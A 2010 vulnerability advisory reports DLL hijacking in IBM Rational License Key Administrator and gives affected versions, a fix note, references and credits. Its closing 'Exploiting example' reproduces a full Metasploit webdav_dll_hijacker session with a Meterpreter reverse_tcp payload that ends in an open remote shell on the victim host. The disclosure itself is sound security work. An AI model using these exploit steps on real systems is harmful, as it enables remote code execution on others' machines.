no one is safe ...

Advisory: IBM Rational License Key Administrator - DLL Hijacking [Update: 30.08.2010]

---------------------------------------------
IBM Rational License Key Administrator - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- IBM Rational License Key Administrator Description

The IBM Rational® License Key Administrator (LKAD) is installed with many IBM Rational products and with your IBM Rational License Server software. This application provides an interface to IBM Rational Common Licensing (powered by FLEXlm software). Use the LKAD or the LKAD wizard to enter or import license keys and change your license configuration.

- Insecure Library Loading Allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS upd"

For more vulnerability details please check the links in the reference section.

- Affected Versions

2002.05.00 (included in AppScan 9) - other releases may also be affected.
Update: 7.0.0.0 fixed

- Solution

It is not known if there are fixed releases available.
Updates to 7.0.0.0 or later should fix this issue.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

http://www-01.ibm.com/software/rational/
http://www.microsoft.com/technet/security/advisory/2269637.mspx
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
http://blog.metasploit.com/2010/08/better-faster-stronger.html
http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
http://www.s3cur1ty.de/advisories

- Exploiting example:

msf exploit(webdav_dll_hijacker) > set EXTENSIONS upd
EXTENSIONS => upd
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  upd              yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents
[*] 10.8.28.55:49253 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49253 PROPFIND /documents/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49253 PROPFIND /
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 PROPFIND /documents/IBFS32.DLL
[*] 10.8.28.55:49253 PROPFIND => 207 File (/documents/IBFS32.DLL)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49253 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49253 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49253 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49253 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49253 GET => DLL Payload
[*] 10.8.28.55:49253 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49253 PROPFIND => 404 (/documents/rundll32.exe)
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 6 opened (10.8.28.9:4444 -> 10.8.28.55:49256) at Sun Aug 29 21:24:02 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > getuid
Server username: m1k3-Vista\m1k3